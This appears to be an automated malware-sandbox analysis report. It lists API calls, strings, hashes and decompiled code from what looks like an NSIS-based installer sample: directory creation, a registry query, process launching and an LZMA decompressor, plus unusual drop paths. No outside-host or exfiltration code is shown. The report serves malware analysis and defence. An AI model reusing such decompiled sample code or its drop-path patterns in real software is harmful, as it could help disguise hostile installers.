                                                        0x004015c9
                                                        0x004015cc
                                                        0x004015d1
                                                        0x004015d5
                                                        0x004015d7
                                                        0x004015df
                                                        0x004015e1
                                                        0x004015e4
                                                        0x004015ea
                                                        0x00401604
                                                        0x00401607
                                                        0x004015ec
                                                        0x004015ec
                                                        0x004015ef
                                                        0x00000000
                                                        0x004015fa
                                                        0x004015fd
                                                        0x004015fd
                                                        0x004015ef
                                                        0x0040160e
                                                        0x00401615
                                                        0x00401624
                                                        0x00401624
                                                        0x00401617
                                                        0x0040161a
                                                        0x00401622
                                                        0x00000000
                                                        0x00000000
                                                        0x00401622
                                                        0x00401615
                                                        0x00401627
                                                        0x0040162b
                                                        0x0040162c
                                                        0x004015d7
                                                        0x00401634
                                                        0x00401663
                                                        0x00402245
                                                        0x00401636
                                                        0x00401638
                                                        0x00401645
                                                        0x0040164d
                                                        0x00401655
                                                        0x0040165b
                                                        0x0040165b
                                                        0x00401655
                                                        0x00402ac2
                                                        0x00402ace

                                                        APIs
                                                          • Part of subcall function 00405BC8: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsn12E4.tmp,?,00405C3C,C:\Users\user\AppData\Local\Temp\nsn12E4.tmp,C:\Users\user\AppData\Local\Temp\nsn12E4.tmp,?,?,7476FAA0,0040597A,?,C:\Users\user\AppData\Local\Temp\,7476FAA0,00000000), ref: 00405BD6
                                                          • Part of subcall function 00405BC8: CharNextW.USER32(00000000), ref: 00405BDB
                                                          • Part of subcall function 00405BC8: CharNextW.USER32(00000000), ref: 00405BF3
                                                        • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                          • Part of subcall function 0040577F: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057C2
                                                        • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth,?,00000000,000000F0), ref: 0040164D
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth, xrefs: 00401640
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                        • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth
                                                        • API String ID: 1892508949-3281557333
                                                        • Opcode ID: be059b02de55be546dd79f47ecb03ede3c1f21afff9b80660869a8e6f73aef5a
                                                        • Instruction ID: cf923580388ec08c1514b784e2bf170a85d63446f7292b2ca235e8bc108e1b76
                                                        • Opcode Fuzzy Hash: be059b02de55be546dd79f47ecb03ede3c1f21afff9b80660869a8e6f73aef5a
                                                        • Instruction Fuzzy Hash: 2E11BE31504105EBCF31AFA4CD0199F36A0EF15368B28493BFA45B22F2DA3E4D519B5E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040611A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 90%
                                                        			E0040611A(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E004060B9(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8); // executed
					_t21 = RegCloseKey(_a20); // executed
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                                        0x00406128
                                                        0x0040612a
                                                        0x00406142
                                                        0x00406147
                                                        0x0040614c
                                                        0x0040618a
                                                        0x0040618a
                                                        0x0040614e
                                                        0x00406160
                                                        0x0040616b
                                                        0x00406171
                                                        0x0040617c
                                                        0x00000000
                                                        0x00000000
                                                        0x0040617c
                                                        0x00406190

                                                        APIs
                                                        • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,?,?,0040638E,80000002), ref: 00406160
                                                        • RegCloseKey.KERNELBASE(?,?,0040638E,80000002,Software\Microsoft\Windows\CurrentVersion,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000,Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade), ref: 0040616B
                                                        Strings
                                                        • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade, xrefs: 00406121
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: CloseQueryValue
                                                        • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade
                                                        • API String ID: 3356406503-227897
                                                        • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                        • Instruction ID: 8ef6f3e619af491bbf380fd7d91826ebef08e06ae3c58d0c48453c9b41c80383
                                                        • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                        • Instruction Fuzzy Hash: BF014872500209FBDF218F51C909ADB3BA8EB55364F01802AFD1AA61A1D678D964CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00405831 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00405831(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x4266f0->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x4266f0,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                        0x0040583a
                                                        0x0040585a
                                                        0x00405862
                                                        0x00405867
                                                        0x00000000
                                                        0x0040586d
                                                        0x00405871

                                                        APIs
                                                        Strings
                                                        • Error launching installer, xrefs: 00405844
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateHandleProcess
                                                        • String ID: Error launching installer
                                                        • API String ID: 3712363035-66219284
                                                        • Opcode ID: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                        • Instruction ID: 0b6998b7e6fa6c2388fbdd89280d1adf89017549f97d9b179fdab4837609bc7e
                                                        • Opcode Fuzzy Hash: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                        • Instruction Fuzzy Hash: ADE0BFB560020ABFEB109F65ED09F7B76ACFB14604F414535BD51F2150D7B4E8158A7C
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00406D8B Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 99%
                                                        			E00406D8B() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004071F9))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4)); // executed
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8)); // executed
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
